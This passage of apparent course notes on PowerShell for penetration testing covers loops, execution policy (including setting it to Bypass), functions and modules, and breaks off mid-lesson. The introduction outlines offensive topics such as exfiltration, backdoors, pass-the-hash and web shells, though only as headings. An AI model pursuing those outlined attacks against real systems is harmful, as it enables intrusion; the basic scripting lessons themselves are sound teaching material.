[ { "path": ".gitignore", "content": ".DS_Store\n" }, { "path": "1-Course-Introduction.md", "content": "#### 1. Course Introduction\n\n- [Nishang](https://github.com/samratashok/nishang) ✅\n\nHelps in using ```PowerShell``` for ```Penetration Testing```\n\n- [Kautilya](https://github.com/samratashok/Kautilya)\n\nToolkit for using ```Human Interface Devices``` in ```Penetration Tests```\n\n\n- Introduction to PowerShell\n- Basics of PowerShell\n- Scripting\n- Advanced Scripting Concepts \n- Modules\n- Jobs\n- PowerShell with .Net\n- Using Windows API with PowerShell \n- PowerShell and WMI\n- Working with COM objects\n- Interacting with the Registry\n\n###### Uses of PowerShell\n\n- Recon and Scanning\n- Exploitation\n - Brute Forcing\n - Client Side Attacks\n - Using existing exploitation techniques\n - Porting exploits to PowerShell – When and how\n - Human Interface Device\n- PowerShell and Metasploit\n - Running PowerShell scripts\n - Using PowerShell in Metasploit exploits\n- Post Exploitation\n - Information Gathering and Exfiltration\n - Backdoors\n - Privilege Escalation\n - Getting system secrets\n- Post Exploitation\r - Passing the hashes/credentials\n - PowerShell Remoting\n - WMI and WSMAN for remote command execution\n - Web Shells\n - Achieving Persistence\n- Using PowerShell with other security tools\n- Defense against PowerShell attacks" }, { "path": "10-Loop-Statements-in-Powershell.md", "content": "#### 10. Loop Statements in Powershell\n\n###### Loop Statements\n\n- while() {}\n\n```PowerShell\nPS C:\\Users\\Windows-32> $count = 3\nPS C:\\Users\\Windows-32> while ( $count -ge 0 )\n>> {\n>> \"Iteration $count\"\n>> $count--\n>> }\n>>\nIteration 3\nIteration 2\nIteration 1\nIteration 0\nPS C:\\Users\\Windows-32>\n```\n\n- do {} while()\n- do {} until()\n- for(;;){}\n- foreach ( in ){}\n\n```PowerShell\nPS C:\\Users\\Windows-32> $process = Get-Process\nPS C:\\Users\\Windows-32> foreach ( $i in $process ) {\n>> $i.Name\n>> }\n>>\ncmd\nconhost\nconhost\ncsrss\ncsrss\ndwm\nexplorer\nIdle\njusched\nlsass\nlsm\nnotepad++\npowershell\nPresentationFontCache\npython\nSearchIndexer\nservices\nsmss\nspoolsv\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nSystem\ntaskhost\nVBoxService\nVBoxTray\nwininit\nwinlogon\nwmpnetwk\nwuauclt\nPS C:\\Users\\Windows-32>\n```\n\n###### Loop Cmdlets\n\n- ForEach-Object\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-Process | ForEach-Object {$_.Name}\ncmd\nconhost\nconhost\ncsrss\ncsrss\ndwm\nexplorer\nIdle\njusched\nlsass\nlsm\nnotepad++\npowershell\nPresentationFontCache\npython\nSearchFilterHost\nSearchIndexer\nSearchProtocolHost\nservices\nsmss\nspoolsv\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nsvchost\nSystem\ntaskhost\nVBoxService\nVBoxTray\nwininit\nwinlogon\nwmpnetwk\nwuauclt\nPS C:\\Users\\Windows-32>\n```\n\n- Where-Object\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-ChildItem C:\\Users\\Windows-32 | Where-Object { $_.Name -match \"txt\" }\n\n\n Directory: C:\\Users\\Windows-32\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/6/2017 9:20 PM 10 text.txt\n\n\nPS C:\\Users\\Windows-32>\n```\n\n###### Exercise\n\nIterate through the processes running on your computer and print the path of the executable for each process.\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Process | ForEach-Object {$_.Name, $_.Path}\ncmd\nC:\\Windows\\system32\\cmd.exe\nconhost\nC:\\Windows\\system32\\conhost.exe\nconhost\nC:\\Windows\\system32\\conhost.exe\ncsrss\ncsrss\ndfsrs\nC:\\Windows\\system32\\DFSRs.exe\ndfssvc\nC:\\Windows\\system32\\dfssvc.exe\ndns\nC:\\Windows\\system32\\dns.exe\ndwm\nC:\\Windows\\system32\\dwm.exe\nexplorer\nC:\\Windows\\Explorer.EXE\nfirefox\nC:\\Program Files\\Mozilla Firefox\\firefox.exe\nfirefox\nC:\\Program Files\\Mozilla Firefox\\firefox.exe\nIdle\nismserv\nC:\\Windows\\System32\\ismserv.exe\nlsass\nC:\\Windows\\system32\\lsass.exe\nMicrosoft.ActiveDirectory.WebServices\nC:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\nmsdtc\nC:\\Windows\\System32\\msdtc.exe\nnotepad\nC:\\Windows\\system32\\NOTEPAD.EXE\npowershell\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\npython\nC:\\Python27\\python.exe\nservices\nsmss\nspoolsv\nC:\\Windows\\System32\\spoolsv.exe\nsvchost\nC:\\Windows\\system32\\svchost.exe\nsvchost\nC:\\Windows\\system32\\svchost.exe\nsvchost\nC:\\Windows\\system32\\svchost.exe\nsvchost\nC:\\Windows\\system32\\svchost.exe\nsvchost\nC:\\Windows\\system32\\svchost.exe\nsvchost\nC:\\Windows\\System32\\svchost.exe\nsvchost\nC:\\Windows\\system32\\svchost.exe\nsvchost\nC:\\Windows\\system32\\svchost.exe\nsvchost\nC:\\Windows\\system32\\svchost.exe\nsvchost\nC:\\Windows\\System32\\svchost.exe\nSystem\ntaskhostex\nC:\\Windows\\system32\\taskhostex.exe\nVBoxService\nC:\\Windows\\System32\\VBoxService.exe\nVBoxTray\nC:\\Windows\\System32\\VBoxTray.exe\nvds\nC:\\Windows\\System32\\vds.exe\nwininit\nC:\\Windows\\system32\\wininit.exe\nwinlogon\nC:\\Windows\\system32\\winlogon.exe\nwlms\nC:\\Windows\\system32\\wlms\\wlms.exe\nPS C:\\Users\\Administrator>\n```\n" }, { "path": "11-Basics-of-Powershell-Scripting.md", "content": "#### 11. Basics of Powershell Scripting\n\n###### PowerShell Scripting\r\r- Write, Save, Execute\n- Execution Policy is ```NOT a security control```\n\n```Powershell``` script\n\n```PowerShell\nPS C:\\Users\\Windows-32\\Desktop> cat .\\HelloWorld.ps1\n\"Hello World\"\nPS C:\\Users\\Windows-32\\Desktop>\n```\n\nUnable to execute ```Powershell``` script because of ```ExecutionPolicy```\n\n```PowerShell\nPS C:\\Users\\Windows-32> cd .\\Desktop\nPS C:\\Users\\Windows-32\\Desktop> .\\HelloWorld.ps1\nFile C:\\Users\\Windows-32\\Desktop\\HelloWorld.ps1 cannot be loaded because the execution of scripts is disabled on this system. Please see \"get-help about_signing\" for more details.\nAt line:1 char:17\n+ .\\HelloWorld.ps1 <<<<\n + CategoryInfo : NotSpecified: (:) [], PSSecurityException\n + FullyQualifiedErrorId : RuntimeException\n\nPS C:\\Users\\Windows-32\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32\\Desktop> Get-ExecutionPolicy\nRestricted\nPS C:\\Users\\Windows-32\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32\\Desktop> Get-Help about_Execution_Policies\nTOPIC\n about_Execution_Policies\n\nSHORT DESCRIPTION\n Describes the Windows PowerShell execution policies and explains\n how to manage them.\n\nLONG DESCRIPTION\n Windows PowerShell execution policies let you determine the\n conditions under which Windows PowerShell loads configuration files\n and runs scripts.\n\n You can set an execution policy for the local computer, for the current\n user, or for a particular session. You can also use a Group Policy\n setting to set execution policy for computers and users.\n\n Execution policies for the local computer and current user are stored\n in the registry. You do not need to set execution policies in your\n Windows PowerShell profile. The execution policy for a particular session\n is stored only in memory and is lost when the session is closed.\n\n The execution policy is not a security system that restricts user actions.\n For example, users can easily circumvent a policy by typing the script\n contents at the command line when they cannot run a script. Instead, the\n execution policy helps users to set basic rules and prevents them from\n violating them unintentionally.\n\n\n WINDOWS POWERSHELL EXECUTION POLICIES\n -------------------------------------\n\n The Windows PowerShell execution policies are as follows:\n\n \"Restricted\" is the default policy.\n\n Restricted\n - Default execution policy.\n\n - Permits individual commands, but will not run\n scripts.\n\n - Prevents running of all script files, including\n formatting and configuration files (.ps1xml), module\n script files (.psm1), and Windows PowerShell\n profiles (.ps1).\n\n AllSigned\n - Scripts can run.\n\n - Requires that all scripts and configuration files\n be signed by a trusted publisher, including scripts\n that you write on the local computer.\n\n - Prompts you before running scripts from publishers\n that you have not yet classified as trusted or\n untrusted.\n\n - Risks running unsigned scripts from sources other\n than the Internet and signed, but malicious, scripts.\n\n RemoteSigned\n - Scripts can run.\n\n - Requires a digital signature from a trusted\n publisher on scripts and configuration files that\n are downloaded from the Internet (including\n e-mail and instant messaging programs).\n\n - Does not require digital signatures on scripts that you have run\n and that you have written on the local computer (not\n downloaded from the Internet).\n\n - Risks running signed, but malicious, scripts.\n\n Unrestricted\n - Unsigned scripts can run. (This risks running malicious\n scripts.)\n\n - Warns the user before running srcipts and configuration\n files that are downloaded from the Internet.\n\n Bypass\n - Nothing is blocked and there are no warnings or\n prompts.\n\n - This execution policy is designed for configurations\n in which a Windows PowerShell script is built in to a\n a larger application or for configurations in which\n Windows PowerShell is the foundation for a program\n that has its own security model.\n\n Undefined\n - There is no execution policy set in the current scope.\n\n - If the execution policy in all scopes is Undefined, the\n effective execution policy is Restricted, which is the\n default execution policy.\n\n\n Note: On systems that do not distinguish Universal Naming Convention (UNC)\n paths from Internet paths, scripts that are identified by a UNC path\n might not be permitted to run with the RemoteSigned execution policy.\n\n\n\n EXECUTION POLICY SCOPE\n ----------------------\n You can set an execution policy that is effective only in a\n particular scope.\n\n The valid values for Scope are Process, CurrentUser, and\n LocalMachine. LocalMachine is the default when setting an\n execution policy.\n\n The Scope values are listed in precedence order.\n\n - Process\n The execution policy affects only the current session\n (the current Windows PowerShell process). The execution\n policy is stored in the $PSExecutionPolicyPreference\n environment variable. This value is deleted when the\n session in which the policy is set is closed.\n\n - CurrentUser\n The execution policy affects only the current user. It\n is stored in the HKEY_CURRENT_USER registry subkey.\n\n - LocalMachine\n The execution policy affects all users on the current\n computer. It is stored in the HKEY_LOCAL_MACHINE\n registry subkey.\n\n The policy that takes precedence is effective in the current\n session, even if a more restrictive policy was set at a lower\n level of precedence.\n\n For more information, see Set-ExecutionPolicy.\n\n\n\n GET YOUR EXECUTION POLICY\n ------------------------------\n To get the Windows PowerShell execution policy that is in\n effect in the current session, use the Get-ExecutionPolicy cmdlet.\n\n The following command gets the current execution policy:\n\n get-executionpolicy\n\n\n To get all of the execution policies that affect the current\n session and displays them in precedence order, type:\n\n get-executionpolicy -list\n\n The result will look similar to the following sample output:\n\n Scope ExecutionPolicy\n ----- ---------------\n MachinePolicy Undefined\n UserPolicy Undefined\n Process Undefined\n CurrentUser RemoteSigned\n LocalMachine AllSigned\n\n In this case, the effective execution policy is RemoteSigned\n because the execution policy for the current user takes precedence\n over the execution policy set for the local computer.\n\n To get the execution policy set for a particular scope, use the\n Scope parameter of Get-ExecutionPolicy.\n\n For example, the following command gets the execution policy for\n the current user scope.\n\n get-executionpolicy -scope CurrentUser\n\n\n\n\n\n CHANGE YOUR EXECUTION POLICY\n ------------------------------\n To change the Windows PowerShell execution policy on your\n computer, use the Set-ExecutionPolicy cmdlet.\n\n The change is effective immediately; you do not need to restart\n Windows PowerShell.\n\n If you set the execution policy for the local computer (the default)\n or the current user, the change is saved in the registry and remains\n effective until you change it again.\n\n If you set the execution policy for the current process, it is\n not saved in the registry. It is retained until the current\n process and any child processes are closed.\n\n\n Note: In Windows Vista and later versions of Windows, to run\n commands that change the execution policy for the local\n computer (the default), start Windows PowerShell with the\n \"Run as administrator\" option.\n\n\n To change your execution policy, type:\n\n Set-ExecutionPolicy \n\n For example:\n\n Set-ExecutionPolicy RemoteSigned\n\n\n\n To set the execution policy in a particular scope, type:\n\n Set-ExecutionPolicy -scope \n\n For example:\n\n Set-ExecutionPolicy RemoteSigned -scope CurrentUser\n\n\n A command to change an execution policy can succeed but\n still not change the effective execution policy.\n\n For example, a command that sets the execution policy for\n the local computer can succeed but be overridden by the\n execution policy for the current user.\n\n\n\n REMOVE YOUR EXECUTION POLICY\n ----------------------------\n To remove the execution policy for a particular scope, set\n the value of the value of the execution policy to Undefined.\n\n For example, to remove the execution policy for all the users of\n the local computer, type:\n\n set-executionpolicy Undefined\n\n Or, type:\n\n set-executionpolicy Undefined -scope LocalMachine\n\n If no execution policy is set in any scope, the effective\n execution policy is Restricted, which is the default.\n\n\n\n SET AN EXECUTION POLICY IN POWERSHELL.EXE\n -----------------------------------------\n You can use the ExecutionPolicy parameter of PowerShell.exe to\n set an execution policy for a new Windows PowerShell session.\n The policy affects only the current session and child sessions.\n\n To set the execution policy for a new session, start Windows PowerShell\n at the command line (such as Cmd.exe or Windows PowerShell), and then use\n the ExecutionPolicy parameter of PowerShell.exe to set the execution\n policy.\n\n For example:\n\n powershell.exe -executionpolicy -allsigned\n\n\n The execution policy that you set is not stored in the registry.\n Instead, it is stored in the $PSExecutionPolicyPreference environment\n variable. The variable is deleted when you close the session in which the\n policy is set.\n\n During the session, the execution policy that is set for the session takes\n precedence over an execution policy that is set in the registry for the\n local computer or current user. However, it does not take precedence over\n the execution policy set by using a Group Policy setting (discussed below).\n\n\n\n USE GROUP POLICY TO MANAGE EXECUTION POLICY\n -------------------------------------------\n You can use the \"Turn on Script Execution\" Group Policy setting\n to manage the execution policy of computers in your enterprise.\n The Group Policy setting overrides the execution policies set in Windows\n PowerShell in all scopes.\n\n The \"Turn on Script Execution\" policy settings are as follows:\n\n -- If you disable \"Turn on Script Execution\", scripts do not run.\n This is equivalent to the \"Restricted\" execution policy.\n\n -- If you enable \"Turn on Script Execution\", you can select an\n execution policy. The Group Policy settings are equivalent to\n the following execution policy settings.\n\n Group Policy Execution Policy\n ------------ ----------------\n Allow all scripts. Unrestricted\n\n Allow local scripts RemoteSigned\n and remote signed\n scripts.\n\n Allow only signed AllSigned\n scripts.\n\n -- If \"Turn on Script Execution\" is not configured, it has no\n effect. The execution policy set in Windows PowerShell is\n effective.\n\n\n The PowerShellExecutionPolicy.adm file adds the\n \"Turn on Script Execution\" policy to the Computer Configuration\n and User Configuration nodes in Group Policy Editor in the following\n paths.\n\n For Windows XP and Windows Server 2003:\n Administrative Templates\\Windows Components\\Windows PowerShell\n\n For Windows Vista and later versions of Windows:\n Administrative Templates\\Classic Administrative Templates\\\n Windows Components\\Windows PowerShell\n\n Policies set in the Computer Configuration node take precedence\n over policies set in the User Configuration node.\n\n The PowerShellExecutionPolicy.adm file is available on the\n Microsoft Download Center. For more information, see \"Administrative\n Templates for Windows PowerShell\" at\n http://go.microsoft.com/fwlink/?LinkId=131786.\n\n\n EXECUTION POLICY PRECEDENCE\n ---------------------------\n When determining the effective execution policy for a\n session, Windows PowerShell evaluates the execution policies\n in the following precedence order:\n\n - Group Policy: Computer Configuration\n - Group Policy: User Configuration\n - Execution Policy: Process (or PowerShell.exe -ExecutionPolicy)\n - Execution Policy: CurrentUser\n - Execution Policy: LocalMachine\n\n\n MANAGE SIGNED AND UNSIGNED SCRIPTS\n ----------------------------------\n If your Windows PowerShell execution policy is RemoteSigned,\n Windows PowerShell will not run unsigned scripts that are\n downloaded from the Internet (including e-mail and instant\n messaging programs).\n\n You can sign the script or elect to run an unsigned script\n without changing the execution policy.\n\n For more information, see about_Signing.\n\n\nSEE ALSO\n Get-ExecutionPolicy\n Set-ExecutionPolicy\n about_Signing\n \"Administrative Templates for Windows PowerShell\"\n (http://go.microsoft.com/fwlink/?LinkId=131786)\n\nPS C:\\Users\\Windows-32\\Desktop>\n```\n\nIn an ```Administrative``` Powershell prompt\n\n```PowerShell\nPS C:\\Windows\\system32> Set-ExecutionPolicy Bypass\n\nExecution Policy Change\nThe execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the\nabout_Execution_Policies help topic. Do you want to change the execution policy?\n[Y] Yes [N] No [S] Suspend [?] Help (default is \"Y\"): Y\nPS C:\\Windows\\system32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32\\Desktop> .\\HelloWorld.ps1\nHello World\nPS C:\\Users\\Windows-32\\Desktop>\n```" }, { "path": "12-Functions-in-Powershell-Part-1.md", "content": "#### 12. Functions in Powershell Part 1\n\n###### Functions\n\r- Simple usage\n\n```PowerShell\nPS C:\\Users\\Windows-32\\Desktop> function add { 1 + 3 }\nPS C:\\Users\\Windows-32\\Desktop> add\n4\nPS C:\\Users\\Windows-32\\Desktop>\n```\n\r- Parameters of a PowerShell function.\r - $args\n \n\t```PowerShell\n\tPS C:\\Users\\Windows-32\\Desktop> function paramshow { $args }\n\tPS C:\\Users\\Windows-32\\Desktop> paramshow\n\tPS C:\\Users\\Windows-32\\Desktop> paramshow \"Hi\"\n\tHi\n\tPS C:\\Users\\Windows-32\\Desktop> paramshow 666\n\t666\n\tPS C:\\Users\\Windows-32\\Desktop>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Windows-32\\Desktop> function paramadd { $args[0] + $args[1] }\n\tPS C:\\Users\\Windows-32\\Desktop> paramadd 3 7\n\t10\n\tPS C:\\Users\\Windows-32\\Desktop>\n\t```\n\n - Declaring parameters\n\n\t```PowerShell\n\tPS C:\\Users\\Windows-32\\Desktop> function newFunction ( $num1, $num2 ) { $num1 * $num2 }\n\tPS C:\\Users\\Windows-32\\Desktop> newFunction 2 6\n\t12\n\tPS C:\\Users\\Windows-32\\Desktop>\n\t```\n\n - Positional and named parameters\n\t\n\t```PowerShell\n\tPS C:\\Users\\Windows-32\\Desktop> function posfunc ($param1, $param2) { $param1 }\n\tPS C:\\Users\\Windows-32\\Desktop> posfunc -param1 2 -param2 4\n\t2\n\tPS C:\\Users\\Windows-32\\Desktop> posfunc 2 4\n\t2\n\tPS C:\\Users\\Windows-32\\Desktop> posfunc -param2 2 -param1 4\n\t4\n\tPS C:\\Users\\Windows-32\\Desktop>\n\t```" }, { "path": "13-Functions-in-Powershell-Part-2.md", "content": "#### 13. Functions in Powershell Part 2\n\n- Dynamic number of Parameters\n\n```PowerShell\nPS C:\\Users\\Windows-32> function fixed_params ($a, $b) {\n>> $a\n>> $b\n>> }\n>>\nPS C:\\Users\\Windows-32> fixed_params 2 4\n2\n4\nPS C:\\Users\\Windows-32> fixed_params 2 4 7\n2\n4\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> function var_params ($a, $b) {\n>> $a\n>> $b\n>> $args\n>> }\n>>\nPS C:\\Users\\Windows-32> var_params 1 2 4 5 7\n1\n2\n4\n5\n7\nPS C:\\Users\\Windows-32>\n```\n\n- Type declaration of the Parameters\n\n```PowerShell\nPS C:\\Users\\Windows-32> function addInt ([int]$a, [int]$b) { $a + $b }\nPS C:\\Users\\Windows-32> addInt 3 6\n9\nPS C:\\Users\\Windows-32>\n```\n\n- Default Values\n\n```PowerShell\nPS C:\\Users\\Windows-32> function default_value ($a=8, $b) {\n>> $a\n>> $b\n>> }\n>>\nPS C:\\Users\\Windows-32> default_value\n8\nPS C:\\Users\\Windows-32> default_value 7 5\n7\n5\nPS C:\\Users\\Windows-32>\n```" }, { "path": "14-Functions-in-Powershell-Part-3.md", "content": "#### 14. Functions in Powershell Part 3\n\n- Switch Parameters\n\n```PowerShell\nPS C:\\Users\\Windows-32> function switchable ($a, $b, [switch]$flip) {\n>> $a + $b\n>> if ($flip) { $a - $b }\n>> }\n>>\nPS C:\\Users\\Windows-32> switchable 1 2\n3\nPS C:\\Users\\Windows-32> switchable 1 2 -flip\n3\n-1\nPS C:\\Users\\Windows-32>\n```\n\n- Returning values\n\n```PowerShell\nPS C:\\Users\\Windows-32> $output = switchable 1 4\nPS C:\\Users\\Windows-32> $output\n5\nPS C:\\Users\\Windows-32>\n```\n\n- Scope of variables and functions\n\n```PowerShell\nPS C:\\Users\\Windows-32> $var1 = 33\nPS C:\\Users\\Windows-32> function fun1 ($var1 = 22) {$var1}\nPS C:\\Users\\Windows-32> $var1\n33\nPS C:\\Users\\Windows-32> fun1\n22\nPS C:\\Users\\Windows-32> $var1\n33\nPS C:\\Users\\Windows-32>\n```\n\n- List all function\n\n```PowerShell\nPS C:\\Users\\Windows-32> ls function:\n\nCommandType Name\n----------- ----\nFunction A:\nFunction addInt\nFunction B:\nFunction C:\nFunction cd..\nFunction cd\\\nFunction Clear-Host\nFunction D:\nFunction default_value\nFunction Disable-PSRemoting\nFunction E:\nFunction F:\nFunction fixed_params\nFunction fun1\nFunction G:\nFunction Get-Verb\nFunction H:\nFunction help\nFunction I:\nFunction ImportSystemModules\nFunction J:\nFunction K:\nFunction L:\nFunction M:\nFunction mkdir\nFunction more\nFunction N:\nFunction O:\nFunction P:\nFunction prompt\nFunction Q:\nFunction R:\nFunction S:\nFunction switchable\nFunction T:\nFunction TabExpansion\nFunction U:\nFunction V:\nFunction var_params\nFunction W:\nFunction X:\nFunction Y:\nFunction Z:\n\n\nPS C:\\Users\\Windows-32>\n```\n\n###### Exercise\n\n- Create a function which accepts name of a process or service and stops it.\n\n```PowerShell\nPS C:\\Users\\Windows-32> Start-Process notepad\nPS C:\\Users\\Windows-32> function ProcessStop ($name) { Stop-Process -Name $name }\nPS C:\\Users\\Windows-32> ProcessStop \"notepad\"\nPS C:\\Users\\Windows-32>\n```\n\n- Use a switch variable in the above function to add the ability of stopping a service as well.\n\n```PowerShell\nPS C:\\Windows\\system32> function ProcessStop ($name1, $name2, [switch]$flip) {\n>> Stop-Process -Name $name1\n>> if ($flip) { Stop-Service $name2 }\n>> }\n>>\nPS C:\\Windows\\system32> ProcessStop \"notepad\" \"WwanSvc\" -flip\nPS C:\\Windows\\system32>\n```\n\n- Accept a PID parameter too. If a PID is passed to the function, attempt should be made only to stop a process.\n\n```PowerShell\nPS C:\\Windows\\system32> function ProcessStop ($name1, $name2, $p_id, [switch]$flip) {\n>> if ($p_id) { Stop-Process $p_id }\n>> else { Stop-Process -Name $name1 }\n>> if ($flip) { Stop-Service $name2 }\n>> }\n>>\nPS C:\\Windows\\system32>\n```\n\n```PowerShell\nPS C:\\Windows\\system32> Start-Process notepad\nPS C:\\Windows\\system32> Start-Process calc\nPS C:\\Windows\\system32> Get-Process notepad\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 56 3 920 4220 55 0.04 2868 notepad\n\n\nPS C:\\Windows\\system32> Get-Process calc\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 70 7 5236 9276 67 0.05 3684 calc\n\n\nPS C:\\Windows\\system32>\n```\n\n```PowerShell\nPS C:\\Windows\\system32> ProcessStop \"calc\" \"\" 2868\n```\n\n```PowerShell\nPS C:\\Windows\\system32> Get-Process notepad\nGet-Process : Cannot find a process with the name \"notepad\". Verify the process name and call the cmdlet again.\nAt line:1 char:12\n+ Get-Process <<<< notepad\n + CategoryInfo : ObjectNotFound: (notepad:String) [Get-Process], ProcessCommandException\n + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand\n\nPS C:\\Windows\\system32>\n```\n\n```PowerShell\nPS C:\\Windows\\system32> Get-Process calc\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 70 7 5236 9276 67 0.05 3684 calc\n\n\nPS C:\\Windows\\system32>\n```" }, { "path": "15-Advanced-Functions-in-Powershell.md", "content": "#### 15. Advanced Functions in Powershell\r\n\r\n###### Advanced Functions\r\n- param statement\r\n- Parameter attributes\r\n - Mandatory\r\n - ```ParameterSetName``` - closest to ```function overloading```\r\n - Position\r\n - ValueFromPipeline\r\n- Parameter Validation\r\n - AllowEmptyString\r\n - AllowNull\r\n - AllowEmptyCollection\r\n - ValidateLength\r\n - ValidatePattern\r\n - ValidateSet\r\n \r\n- ```paramatrributes.ps1```\r\n\r\n```PowerShell\r\nfunction advancedfunction\r\n{\r\n param (\r\n [Parameter (Mandatory = $True, Position = 0, ValueFromPipeline = $True, ParameterSetName=\"ParamSet1\")]\r\n [ValidateSet(1,2,3)]\r\n# [AllowNull()]\r\n $a,\r\n\r\n [Parameter (Position = 1)]\r\n $b\r\n )\r\n\r\n Write-Output \"a is $a\"\r\n Write-Output \"b is $b\"\r\n}\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\15> ls\r\n\r\n\r\n Directory: C:\\Users\\Administrator\\Desktop\\15\r\n\r\n\r\nMode LastWriteTime Length Name\r\n---- ------------- ------ ----\r\n-a--- 7/10/2017 6:25 PM 306 paramatrributes.ps1\r\n\r\n\r\nPS C:\\Users\\Administrator\\Desktop\\15>\r\n```\r\n\r\n- ```Dot Sourcing```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\15> . .\\paramatrributes.ps1\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\15> paramattributes 1 2\r\na is 1\r\nb is 2\r\nPS C:\\Users\\Administrator\\Desktop\\15>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\15> paramattributes -a 2 -b 6\r\na is 2\r\nb is 6\r\nPS C:\\Users\\Administrator\\Desktop\\15>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\15> paramattributes\r\n\r\ncmdlet paramattributes at command pipeline position 1\r\nSupply values for the following parameters:\r\na: 3\r\nb: 4\r\na is 3\r\nb is 4\r\nPS C:\\Users\\Administrator\\Desktop\\15>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\15> 1 | paramattributes -b 7\r\na is 1\r\nb is 7\r\nPS C:\\Users\\Administrator\\Desktop\\15>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop\\15> paramattributes -a $null -b 6\r\n```\r\n" }, { "path": "16-Advanced-Scripting-with-Powershell.md", "content": "#### 16. Advanced Scripting with Powershell\n\n###### PowerShell Scripting\n\n- Dot sourcing\n- CmdletBinding\n - Verbose Output\n - Parameter Checks\n - SupportsShouldProcess (```-WhatIf``` and ```-Confirm```)\n \n- ```Show-AdvancedScript.ps1```\n\n```Powershell\nfunction Show-AdvancedScript\n{\n [CmdletBinding( SupportsShouldProcess = $True)]\n param(\n [Parameter()]\n $FilePath\n )\n\n Write-Verbose \"Deleting $FilePath\"\n if ($PSCmdlet.ShouldProcess(\"$Filepath\", \"Deleting file permanently\"))\n {\n Remove-Item $FilePath\n }\n}\n```\n\n```Powershell\nPS C:\\Users\\Windows10-32> C:\\Users\\Windows10-32\\Desktop\\Show-AdvancedScript.ps1\n```\n\n```Powershell\nPS C:\\Users\\Windows10-32> Show-AdvancedScript -FilePath .\\1.txt\n```\n\n```Powershell\nPS C:\\Users\\Windows10-32> Show-AdvancedScript -FilePath .\\2.txt -Verbose\nVERBOSE: Deleting .\\2.txt\nVERBOSE: Performing the operation \"Deleting file permanently\" on target \".\\2.txt\".\n\nPS C:\\Users\\Windows10-32>\n```\n\n```Powershell\nPS C:\\Users\\Windows10-32> Show-AdvancedScript -FilePath .\\3.txt -WhatIf\nWhat if: Performing the operation \"Deleting file permanently\" on target \".\\3.txt\".\n\nPS C:\\Users\\Windows10-32>\n```\n\n```Powershell\nPS C:\\Users\\Windows10-32> Show-AdvancedScript -FilePath .\\3.txt -Confirm\n```\n" }, { "path": "17-Module-in-Powershell-Part-1.md", "content": "#### 17. Module in Powershell Part 1\r\n\r\n###### Modules\r\n\r\n- Help topic for ```module```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32> Get-Help *module*\r\n\r\nName Category Module Synopsis\r\n---- -------- ------ --------\r\nImportSystemModules Function ...\r\nExport-ModuleMember Cmdlet Microsoft.PowerShell.Core ...\r\nGet-Module Cmdlet Microsoft.PowerShell.Core ...\r\nImport-Module Cmdlet Microsoft.PowerShell.Core ...\r\nNew-Module Cmdlet Microsoft.PowerShell.Core ...\r\nNew-ModuleManifest Cmdlet Microsoft.PowerShell.Core ...\r\nRemove-Module Cmdlet Microsoft.PowerShell.Core ...\r\nTest-ModuleManifest Cmdlet Microsoft.PowerShell.Core ...\r\nInModuleScope Function Pester ...\r\nUninstall-Module Function PowerShellGet ...\r\nInstall-Module Function PowerShellGet ...\r\nPublish-Module Function PowerShellGet ...\r\nUpdate-ModuleManifest Function PowerShellGet ...\r\nSave-Module Function PowerShellGet ...\r\nUpdate-Module Function PowerShellGet ...\r\nGet-InstalledModule Function PowerShellGet ...\r\nFind-Module Function PowerShellGet ...\r\n\r\n\r\nPS C:\\Users\\Windows10-32>\r\n```\r\n\r\n- Listing Modules\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows10-32> Get-Module -ListAvailable -All\r\n\r\n\r\n Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Test\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nManifest 1.0.1 Example2.Diagnostics\r\n\r\n\r\n Directory: C:\\Program Files\\WindowsPowerShell\\Modules\r\n\r\n\r\nModuleType Version Name ExportedCommands\r\n---------- ------- ---- ----------------\r\nBinary 0.0.0.0 Microsoft.PackageManagement\r\nBinary 0.0.0.0 Microsoft.PackageManagement.Arch...\r\nBinary 0.0.0.0 Microsoft.PackageManagement.Core...\r\nBinary 0.0.0.0 Microsoft.PackageManagement.Meta...\r\nBinary 0.0.0.0 Microsoft.PackageManagement.MsiP...\r\nBinary 0.0.0.0 Microsoft.PackageManagement.MsuP...\r\nScript 1.0.1 Microsoft.PowerShell.Operation.V... {Get-OperationValidation, Invoke-OperationValidation}\r\nScript 1.0.1 